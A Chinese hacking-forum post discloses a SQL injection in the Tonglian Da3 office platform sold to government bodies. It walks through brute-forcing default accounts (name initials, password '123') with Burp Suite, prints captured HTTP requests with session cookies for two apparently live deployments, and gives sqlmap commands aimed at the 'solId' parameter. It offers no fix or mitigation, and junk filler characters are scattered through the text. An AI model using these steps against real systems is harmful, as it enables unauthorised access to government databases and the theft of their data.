找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1343|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, w( v8 Z' v" j4 a7 ~
' P/ q! Q5 f& g$ L) v

( u0 E. t: O, q. K( d2 v

9 T2 @- r' \) K/ \, E# H 平台简介:) J, s6 k* T% {

7 ?9 W" B9 v4 ~5 O" A9 u* @( E3 R

$ w5 X3 I& C' ^0 m) v- A: H2 ^   2 r4 Z8 Q- x% O# f% N2 r" I

: P! P8 R: Y! f( y/ Z# S( G2 Q

: l4 j. { R2 ~0 Z. f3 i5 f3 V 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 |- _6 I! Q+ H7 y, m) W 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% Q; \$ l$ Q' `* A同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 6 ^0 R1 C7 b" e5 M0 p5 L

8 x8 @7 g0 g. }# t, |4 X

) d1 j/ @- J' v1 ^' i8 w" {0 e U0 J  4 p) ~# _) n' K. |: y% N/ q( @) v

$ c+ S: c0 ^+ `3 c @8 |

0 X3 B. X0 D% j8 f 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: % `+ C6 k* n! X/ g- Q* F; ]

: b" j$ G. {4 V: `

2 |3 f; T# w3 z/ B! U) J  " U# I( h! f( P( l4 J Q4 ~' M3 t

# ` A) D9 ?# |4 _! g& x' F

5 d) ^3 t/ y; R http://1.1.1.1:7197/cap-aco/#(案例2-) . W; C& x. x! a4 d$ }' h

& K$ V2 V. X$ `8 V: ^

0 `7 D- w) v7 T& M- `6 O http://www.XXOO.com (案例1-官网网站) 9 u9 j, j: b9 t0 j+ {- ^

l* F% X" e& e0 I) S

5 P9 R/ P# E8 ` w; G1 _$ W+ A   8 V3 s, \( U! D1 b; p

0 B# R0 u* q' ]& B+ Z

2 ^7 p! N- R3 n' F3 ^) k5 e7 O 漏洞详情: : H9 W& \4 y9 p7 Z

' T5 G5 J& {/ C9 d9 B! E* L

1 _0 w! P; l. L  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试7 E; \% p8 Q6 A. ]1 Y' v

! e7 t5 O! B# v6 h

$ @% B# d# C' U! ^ U r      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: & C6 o5 M9 v) P- }

; p$ ]+ v% C, U6 E5 g5 i8 h

7 I2 u5 R; O1 s, a) ^: \# i/ B   : O v. ^; G1 m

" W+ M( G, B' G$ J, u

% u: v7 H" J7 p  * z3 c9 o. p4 W- f5 W# |

2 ?, `" `, w7 z) n1 v! W2 O8 a" A C5 ~

7 J; I. i% w; N, ]* D7 Y status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: " e9 x( ]+ ^! x; y2 v6 l

4 H) Q) _; `/ S

2 D! U X9 A" ~9 d: l& \' g1 j 1、案例1-官方网站 G: w" _* \9 X$ H- l, ^

! ?8 p. g1 R4 ^% A3 z8 w

8 o6 ^4 h) l6 _ M2 O5 [! u GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1" t" P' K$ X q' t$ C

$ S1 s/ L- }7 F- B' i

k! y" u3 I4 K7 i7 ~ Host: www.XXOO.com% c2 z! b# i. ?1 ^9 M

# z6 s% @7 ]4 U* S6 k' y- N

# V. s1 C0 |/ j, A) P Proxy-Connection: Keep-Alive + r6 q: A% G% s

5 h. O; X6 t' X6 b' M/ D

% e4 Q8 H/ `9 V5 @ Accept: application/json, text/javascript, */*; q=0.01 7 {" u4 c5 q1 z9 k2 G- _8 c

( m& O: I/ H- a N" Y9 p2 i P' a

( X6 ?# ^9 a i( _% r: p Accept-Language: zh-CN 5 m4 L/ m C7 r

7 k0 D. K$ Q* r/ | g) ~2 o; v

0 U, I* Q9 R2 b Content-Type: application/json + F: T2 _$ f: A5 ~6 W

2 g5 k) a+ r, w# |

( n3 r% v0 w/ Z7 U4 Y User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko$ M+ ~/ h& N J0 Q* i

4 `6 |% s/ {- r6 _; G. M- `* i

- v5 J5 y- K, s3 h! l6 v X-Requested-With: XMLHttpRequest' v/ Z3 T3 u k& R- h

2 a% V' Z+ ?( Y0 d; _

# p8 D# a3 p' Z+ V6 U Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 9 e! O8 Q1 }( w; E h) F% U" K

5 ^. ?( y4 s0 F$ P

5 g! u3 }0 S* \8 {* A Accept-Encoding: gzip, deflate, sdch 8 c& Y4 I. S8 ~6 e8 v9 A, `

J7 t! `4 _5 X2 ?- h

. P1 m. R! W7 K$ s Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e 8 T* v+ t4 r" s: @' f

6 s& v/ E$ U" L1 o9 f

{1 D- s/ E* j9 I& B; L K 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:& Y, E: U3 e: Z j p

) }4 v! ]! u% @+ h

+ m! t$ H, W& |9 J3 I w& O A   5 Z1 J7 R6 J3 }4 L" r! b

& a5 T' j X7 s, i

0 l8 l2 X$ L/ F8 s9 \   7 c- [0 i1 \ [* b8 J4 I: A1 m, z

8 t8 V/ o0 c# h* |8 q1 a

- J+ }* a1 X4 D; N$ t2 |  6 j* g; i8 U/ G7 g5 t

9 ^- q0 _) ~1 F

0 B3 ]. }3 z: x4 W  3 T5 a+ l, \) \! p& x

3 b) ]2 N4 X* o$ S

; ~" M( O+ Z. K. z  , c) d. M& p8 ~3 u1 x2 `

# D7 K, @0 e8 `* G7 {

L' o: r0 F- Z* T0 \3 b; k 2、案例2-某天河云平台3 E: a6 N5 E2 ]1 v0 O/ L4 ?

$ {* ~ s3 i% b: e! B

+ {1 |! O3 Z! Y' y) ?# N# k' t GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 / f d8 {3 o5 B" D8 s% N9 z6 u

[0 o* ?- e9 ?* j

$ R3 Q. F" q, [ Host: 1.1.1.:7197 + q; e! h% E% J

. l5 ^1 l: d( Z! W) c3 D" ^

5 q0 I- R3 [) V, C0 j$ s8 k$ D7 ]2 t Accept: application/json, text/javascript, */*; q=0.015 d/ {9 n; U2 _& Z; a W# W% P! W0 E4 k

/ k- G6 r9 g1 {% {2 Y+ D. e8 T

1 { f* ^! j6 F+ V X-Requested-With: XMLHttpRequest " [8 h4 u- H2 E% e1 S3 h

4 Q& x% t9 R6 R1 T4 G

, S' B, t& Y8 H( E User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0' C$ Z$ J8 n H* b

) m: J; Q, v9 l8 h y4 H% d

2 B0 l$ D$ E7 X2 i" Q @ y Content-Type: application/json8 y" |, k& l' r# c1 e# J6 v7 f `

2 n8 A6 R$ F h& U$ l8 g

1 ]: k6 g- |+ p2 d Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 ' J& m; h3 u' n" D; S, I: G* C/ W

' s0 ^- A" U, i/ H4 y1 |

% j- i8 C" r! l( c Accept-Language: zh-CN,zh;q=0.8 ( I! I! W7 l& N! G ~7 v0 Y

/ c( l& o% m9 n, z( c

9 s+ m) A" j- t0 a- o e Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1) s0 \8 @! o5 }* R- D, ]! W: n4 q

: l+ U8 H2 o% [5 q

% u4 O8 t* _' T0 c Connection: close' n& a. w; P% v' e8 \# d3 c

- F6 C; [) b" r- E: o- G6 u# } e

$ s/ q; r+ u" Q9 I5 o 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 7 B( i8 @2 J: T3 R

) a3 h; G* h' K8 m

& D) r7 s; P2 h( Z   , M- `& h4 b8 f3 b- K' z

1 u1 u. K( f: N, O, Q

% W1 g- C9 D4 B7 s" y5 _/ r; p; N/ X9 C
5 C2 e# a" Z% q( C6 ?1 X7 ^

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表